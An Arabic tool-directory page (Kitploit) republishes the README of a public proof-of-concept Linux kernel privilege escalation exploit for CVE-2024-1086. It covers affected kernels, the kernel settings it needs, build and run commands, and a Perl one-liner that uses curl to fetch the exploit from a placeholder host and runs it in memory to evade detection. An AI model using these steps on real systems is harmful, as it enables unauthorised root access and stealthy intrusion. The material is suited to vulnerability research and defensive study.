Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-1086 — استغلال تصعيد امتيازات محلي شامل لـ CVE-2024-1086 يستهدف نوى Linux من v5.14 إلى v6.6، مع معدل نجاح مرتفع ودعم تنفيذ بدون ملفات. | Kitploit
أدوات/GitHubGitHub/b1nhack/cve-2024-1086
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالأوراق والأبحاثالتعلم والتعليماستغلال الملفات الثنائية
GitHubb1nhack/cve-2024-1086

CVE-2024-1086

استغلال تصعيد امتيازات محلي شامل لـ CVE-2024-1086 يستهدف نوى Linux من v5.14 إلى v6.6، مع معدل نجاح مرتفع ودعم تنفيذ بدون ملفات.

عرض المستودع
1منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-1086

إثبات مفهوم عالمي لتصعيد الامتيازات المحلية لـ CVE-2024-1086، يعمل على معظم نوى لينكس بين الإصدارين v5.14 و v6.6، بما في ذلك دبيان وأوبونتو وKernelCTF. نسبة النجاح هي 99.4% في صور KernelCTF.

https://github.com/Notselwyn/CVE-2024-1086/assets/68616630/a3d43951-94ab-4c09-a14b-07b81f89b3de

منشور المدونة / الشرح المفصل

يمكن العثور على شرح كامل للاستغلال - بما في ذلك معلومات الخلفية والكثير من الرسوم البيانية المفيدة - في منشور Flipping Pages.

الإصدارات المتأثرة

يؤثر الاستغلال على الإصدارات من (بما في ذلك) v5.14 إلى (بما في ذلك) v6.6، باستثناء الفروع المصححة v5.15.149>، v6.1.76>، v6.6.15>. تم إصدار التصحيح لهذه الإصدارات في فبراير 2024. الثغرة الأساسية تؤثر على جميع الإصدارات (باستثناء الفروع المستقرة المصححة) من v3.15 إلى v6.8-rc1.

تحذيرات:

  • لا يعمل الاستغلال على نوى v6.4> مع إعدادات kconfig CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y (بما في ذلك أوبونتو v6.5)
  • يتطلب الاستغلال مساحات أسماء المستخدمين (kconfig CONFIG_USER_NS=y)، وأن تكون مساحات أسماء المستخدمين غير مميزة (أمر sh sysctl kernel.unprivileged_userns_clone = 1)، وأن يكون nf_tables ممكّنًا (kconfig CONFIG_NF_TABLES=y). بشكل افتراضي، كل هذه ممكّنة على دبيان وأوبونتو وKernelCTF. لم يتم اختبار توزيعات أخرى، ولكن قد تعمل أيضًا. بالإضافة إلى ذلك، تم اختبار الاستغلال فقط على x64/amd64.
  • قد يكون الاستغلال غير مستقر للغاية على الأنظمة التي تحتوي على نشاط شبكي كبير
    • الأنظمة المزودة بمحول WiFi، عندما تكون محاطة بشبكات WiFi عالية الاستخدام، ستكون غير مستقرة جدًا.
    • على أجهزة الاختبار، يرجى إيقاف تشغيل محولات WiFi عبر BIOS.
  • ذعر النواة (تعطل النظام) بعد تشغيل الاستغلال هو تأثير جانبي لم يتم إصلاحه عمدًا لمنع الاستخدام الخبيث للاستغلال (أي يجب أن تكون محاولات الاستغلال الآن أكثر وضوحًا، وغير عملية في العمليات الواقعية). على الرغم من ذلك، فإنه لا يزال يسمح بإثبات مفهوم عملي في بيئات المختبر، حيث أن شل الجذر يعمل، والاستمرارية عبر القرص ممكنة.

الاستخدام

الإعدادات

يجب أن تعمل القيم الافتراضية مباشرة على دبيان وأوبونتو وKernelCTF باستخدام شل محلي. في الإعدادات/التوزيعات غير المختبرة، يرجى التأكد من تطابق قيم kconfig مع النواة المستهدفة. يمكن تحديدها في src/config.h. إذا كنت تشغل الاستغلال على جهاز به أكثر من 32 جيبي بايت من الذاكرة الفعلية، تأكد من زيادة CONFIG_PHYS_MEM. إذا كنت تشغل الاستغلال عبر SSH (إلى جهاز الاختبار) أو شل عكسي، قد ترغب في تبديل CONFIG_REDIRECT_LOG إلى 1 لتجنب النشاط الشبكي غير الضروري.

البناء

إذا كان ذلك غير عملي بالنسبة لك، يوجد ثنائي مُجمّع لـ x64 بالإعدادات الافتراضية.

root@kitploit:~
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make

الملف الثنائي: CVE-2024-1086/exploit

التشغيل

تشغيل الاستغلال بنفس السهولة:

root@kitploit:~
./exploit

التنفيذ بدون ملفات مدعوم أيضًا، في حالات اختبار الاختراق حيث يجب تجنب الاكتشافات. ومع ذلك، يجب تثبيت Perl على الهدف:

root@kitploit:~
perl -e '
  require qw/syscall.ph/;

  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  system "curl https://example.com/exploit -s >&$fd";
  exec {"/proc/$$/fd/$fd"} "memfd";
'

إخلاء المسؤولية

البرامج والنصوص البرمجية ("البرامج") في هذا الدليل/المجلد/المستودع ("المستودع") يتم نشرها وتطويرها وتوزيعها لأغراض تعليمية/بحثية فقط. أنا ("المنشئ") لا أؤيد أي استخدام ضار أو غير قانوني للبرامج في هذا المستودع، حيث أن القصد هو مشاركة الأبحاث وليس القيام بأنشطة غير قانونية بها. أنا لست مسؤولاً قانونياً عن أي شيء تفعله بالبرامج في هذا المستودع.

تنزيل الأداة